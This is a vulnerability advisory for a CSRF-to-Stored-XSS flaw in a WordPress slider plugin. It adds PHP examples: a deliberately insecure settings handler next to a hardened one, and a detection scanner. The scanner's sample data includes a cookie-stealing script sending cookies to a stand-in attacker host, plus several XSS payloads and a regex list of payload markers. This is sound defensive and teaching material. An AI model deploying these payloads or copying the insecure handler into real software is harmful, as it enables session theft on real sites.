CVE-2025-28966

EUVD-2025-17172 | HIGH
Published 2025-06-06
CVSS 3.1 base score 7.1

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: Low

Lifecycle Timeline

Analysis Generated: Mar 14, 2026 18:10 (vuln.today)
EUVD ID Assigned: Mar 14, 2026 18:10 (euvd), EUVD-2025-17172
CVE Published: Jun 06, 2025 13:15 (nvd), HIGH 7.1

Description

Cross-Site Request Forgery (CSRF) vulnerability in dilemma123 Recent Posts Slider Responsive allows Stored XSS. This issue affects Recent Posts Slider Responsive: from n/a through 1.0.1.

Analysis

CVE-2025-28966 is a Cross-Site Request Forgery (CSRF, CWE-352) vulnerability in the dilemma123 Recent Posts Slider Responsive WordPress plugin, affecting versions through 1.0.1, that can be chained into Stored XSS. The attacker needs no account on the target site (PR:N), but does need a logged-in administrator to load a page under the attacker's control (UI:R); the victim's browser then submits a forged request to the plugin's configuration handler with the administrator's session cookies attached, and the plugin stores the attacker-supplied value because it performs no nonce check and no sanitization. Because the payload persists in the database and is rendered unescaped, the JavaScript later executes in the browsers of administrators and site visitors (Scope: Changed), which is the path to session theft, malicious redirects, malware distribution or defacement. The CVSS 3.1 base score of 7.1 is rated High, not moderate; any site running an affected version of the plugin should treat removal or upgrade as urgent.

Technical Context

The Recent Posts Slider Responsive plugin for WordPress (CPE: wp:dilemma123:recent-posts-slider-responsive) has a CSRF weakness (CWE-352) combined with insufficient input validation and output encoding, which together yield Stored XSS (CWE-79). The root cause is that the plugin accepts and stores user-supplied configuration data on a state-changing request without verifying a WordPress nonce, and later echoes the stored value without escaping. WordPress plugins run server-side with write access to the wp_options and post metadata tables; when a forged request is accepted on the strength of the victim administrator's cookies alone, attacker-controlled content lands in the database. When the slider is rendered, the stored payload executes client-side in administrator dashboards or front-end pages. Because the payload is served from the site's own origin, same-origin and Referer-based defenses do not help, and a Content Security Policy only blocks it if the policy forbids inline scripts, which most WordPress sites do not deploy. The slider likely iterates over post data or configuration values and echoes them into the DOM without sanitization; the advisory does not identify the specific field.
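The following is an added illustration of the pattern just described, not code from the Recent Posts Slider Responsive plugin or from the advisory: a minimal WordPress settings handler written first with the CSRF and output-encoding defects side by side, then hardened with a nonce check, a capability check, input sanitization and output escaping. The option names (rps_demo_title, rps_demo_count), the admin-post actions (rps_demo_save_unsafe, rps_demo_save) and the nonce action and field names (rps_demo_settings, rps_demo_nonce) are invented for the example; all WordPress functions used are standard core API.

```php
<?php
/**
 * Added example (not the plugin's code). Shows the CSRF-to-Stored-XSS pattern
 * in a WordPress admin-post settings handler and the corresponding fix.
 * Option/action/nonce names are invented for illustration.
 */

// ---- Vulnerable pattern: no nonce, no capability check, no output escaping ----

add_action( 'admin_post_rps_demo_save_unsafe', 'rps_demo_save_unsafe' );

function rps_demo_save_unsafe() {
    // Any POST that arrives with a logged-in administrator's cookies is honoured.
    // A page on another origin can auto-submit a form to this action; the
    // browser attaches the victim's WordPress session cookie and the plugin
    // cannot tell the forged save from a legitimate one. That is the CSRF half.
    update_option( 'rps_demo_title', $_POST['title'] ?? '' ); // stored verbatim
    wp_safe_redirect( admin_url( 'options-general.php' ) );
    exit;
}

function rps_demo_render_unsafe() {
    // The stored value is echoed into the page without escaping, so markup saved
    // through the forged request runs in every browser that renders the slider.
    // That is the Stored XSS half.
    echo '<div class="rps-demo-title">' . get_option( 'rps_demo_title', '' ) . '</div>';
}

// ---- Hardened pattern: capability + nonce on write, sanitize in, escape out ----

add_action( 'admin_post_rps_demo_save', 'rps_demo_save' );

function rps_demo_save() {
    // 1. Only users allowed to change site settings may reach the write path.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges', '', array( 'response' => 403 ) );
    }
    // 2. check_admin_referer() verifies the nonce field and calls wp_die() on a
    //    missing or invalid token. The nonce is derived from the user's session,
    //    so a page on another origin cannot obtain or guess it.
    check_admin_referer( 'rps_demo_settings', 'rps_demo_nonce' );

    // 3. Sanitize on input: wp_unslash() removes WordPress's added slashes,
    //    sanitize_text_field() strips tags and control characters, and the
    //    numeric setting is coerced and clamped to a sane range.
    $title = sanitize_text_field( wp_unslash( $_POST['title'] ?? '' ) );
    $count = min( 20, max( 1, absint( $_POST['count'] ?? 5 ) ) );

    update_option( 'rps_demo_title', $title );
    update_option( 'rps_demo_count', $count );

    wp_safe_redirect( add_query_arg( 'rps_demo_saved', '1', admin_url( 'options-general.php' ) ) );
    exit;
}

function rps_demo_settings_form() {
    // The legitimate form carries the nonce field that the handler demands.
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-post.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="rps_demo_save">';
    wp_nonce_field( 'rps_demo_settings', 'rps_demo_nonce' );
    echo '<input type="text" name="title" value="' . esc_attr( get_option( 'rps_demo_title', '' ) ) . '">';
    echo '<input type="number" name="count" value="' . esc_attr( get_option( 'rps_demo_count', 5 ) ) . '">';
    submit_button( 'Save' );
    echo '</form>';
}

function rps_demo_render() {
    // 4. Escape on output regardless of input sanitization: the option may have
    //    been written by another code path or by an older, unpatched version.
    echo '<div class="rps-demo-title">' . esc_html( get_option( 'rps_demo_title', '' ) ) . '</div>';
}
```

The two halves of the fix are independent: the nonce and capability checks close the CSRF write path, while escaping at the point of output (esc_html for text content, esc_attr inside attributes) neutralises anything that is already in the database, including values stored before the fix was applied.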

Affected Products

Recent Posts Slider Responsive (1.0.1 and all prior versions)

Remediation

Primary (priority: CRITICAL): Deactivate and uninstall the Recent Posts Slider Responsive plugin immediately if the vendor has not released a patched version.
Secondary (priority: HIGH): Replace it with an actively maintained slider plugin (e.g., Elementor, Slider Revolution, or native WordPress block-based alternatives). Check the plugin's page and changelog on the WordPress.org plugin repository for abandoned or closed status.
Mitigation if removal is not immediately possible (priority: MEDIUM): Add Web Application Firewall (WAF) rules that block POST requests to the plugin's slider configuration endpoints whose Origin or Referer header is not the site itself, or that carry no nonce field at all. A WAF cannot validate a WordPress nonce (the token is tied to the user and session), so this is a stopgap only. Restricting the endpoints to authenticated administrators does not stop CSRF: the forged request already carries the administrator's session cookies.
Detection (priority: HIGH): Audit the wp_options and wp_postmeta tables for entries written by the plugin; search slider configuration fields for script or iframe tags, event-handler attributes, and HTML-entity, URL- or base64-encoded variants of them.
Future prevention (priority: ONGOING): Enforce WordPress security best practices: use security plugins (Wordfence, Sucuri) with vulnerability scanning, monitor plugin update status, and run a Web Application Firewall with the OWASP Core Rule Set.
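As an added example of the detection step (not part of the advisory and not the plugin's code), the script below scans option rows for the payload shapes a CSRF-to-Stored-XSS attack would leave behind, checking each value in raw, HTML-entity-decoded, URL-decoded, base64-decoded and PHP-serialized forms. The rows are constructed sample data in the shape of wp_options with invented option names; on a live site the same function can be fed the result of `$wpdb->get_results( "SELECT option_name, option_value FROM {$wpdb->options}", ARRAY_A )` from a `wp eval-file` run, and wp_postmeta rows after mapping meta_key/meta_value onto option_name/option_value.

```php
<?php
/**
 * Added example: scan option values for stored-XSS payload shapes.
 * Sample rows below are constructed; option names are invented.
 */

function rps_payload_markers(): array {
    return array(
        '/<\s*script\b/i',
        '/<\s*iframe\b/i',
        '/<\s*(svg|object|embed)\b/i',
        '/\bon[a-z]+\s*=/i',        // onerror=, onload=, ... (may also hit benign text; review hits)
        '/javascript\s*:/i',
        '/data\s*:\s*text\/html/i',
    );
}

/** Decoded forms a payload may hide behind; each is checked independently. */
function rps_decoded_variants( string $value ): array {
    $variants = array(
        'raw'           => $value,
        'html_entities' => html_entity_decode( $value, ENT_QUOTES | ENT_HTML5, 'UTF-8' ),
        'url'           => rawurldecode( $value ),
    );
    // Treat as base64 only if strictly valid and decoding to UTF-8 text.
    if ( strlen( $value ) % 4 === 0 && preg_match( '/^[A-Za-z0-9+\/]+={0,2}$/', $value ) ) {
        $decoded = base64_decode( $value, true );
        if ( $decoded !== false && mb_check_encoding( $decoded, 'UTF-8' ) ) {
            $variants['base64'] = $decoded;
        }
    }
    // WordPress stores array options as PHP-serialized strings; scan string leaves.
    if ( strncmp( $value, 'a:', 2 ) === 0 ) {
        $data = @unserialize( $value, array( 'allowed_classes' => false ) );
        if ( is_array( $data ) ) {
            $leaves = array();
            array_walk_recursive( $data, function ( $leaf ) use ( &$leaves ) {
                if ( is_string( $leaf ) ) {
                    $leaves[] = html_entity_decode( $leaf, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
                }
            } );
            $variants['serialized'] = implode( "\n", $leaves );
        }
    }
    return $variants;
}

/** Returns one entry per matching marker, naming the form it was found in. */
function rps_scan_value( string $value ): array {
    $hits     = array();
    $variants = rps_decoded_variants( $value );
    foreach ( rps_payload_markers() as $re ) {
        foreach ( $variants as $form => $text ) {
            if ( preg_match( $re, $text, $m ) ) {
                $hits[] = sprintf( '%s (in %s form)', trim( $m[0] ), $form );
                break; // one report per marker is enough
            }
        }
    }
    return $hits;
}

/** Rows are arrays with option_name and option_value keys, as wp_options returns them. */
function rps_scan_rows( array $rows ): array {
    $findings = array();
    foreach ( $rows as $row ) {
        $hits = rps_scan_value( (string) $row['option_value'] );
        if ( $hits ) {
            $findings[ $row['option_name'] ] = $hits;
        }
    }
    return $findings;
}

// Constructed sample rows (not real data). attacker.test uses the reserved .test TLD.
$sample_rows = array(
    array( 'option_name' => 'rps_demo_title',  'option_value' => 'Latest posts' ),
    array( 'option_name' => 'rps_demo_title2', 'option_value' => 'News<script>new Image().src="//attacker.test/?c="+document.cookie</script>' ),
    array( 'option_name' => 'rps_demo_html',   'option_value' => '&lt;img src=x onerror=alert(1)&gt;' ),
    array( 'option_name' => 'rps_demo_blob',   'option_value' => base64_encode( '<iframe src="//attacker.test"></iframe>' ) ),
    array( 'option_name' => 'rps_demo_cfg',    'option_value' => serialize( array( 'title' => 'Recent', 'html' => '<svg onload=alert(1)>' ) ) ),
    array( 'option_name' => 'rps_demo_count',  'option_value' => '5' ),
);

foreach ( rps_scan_rows( $sample_rows ) as $name => $hits ) {
    printf( "%-16s %s\n", $name, implode( '; ', $hits ) );
}
```

Hits are leads, not verdicts: the event-handler pattern in particular can match legitimate prose, so review each flagged row by hand, and compare the option's last-modified time (from the database or backups) against admin access logs to confirm whether it was written during a session the administrator did not initiate.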

Priority Score

36 (scale: Low / Medium / High / Critical)
KEV: 0
EPSS: +0.0
CVSS: +36
POC: 0
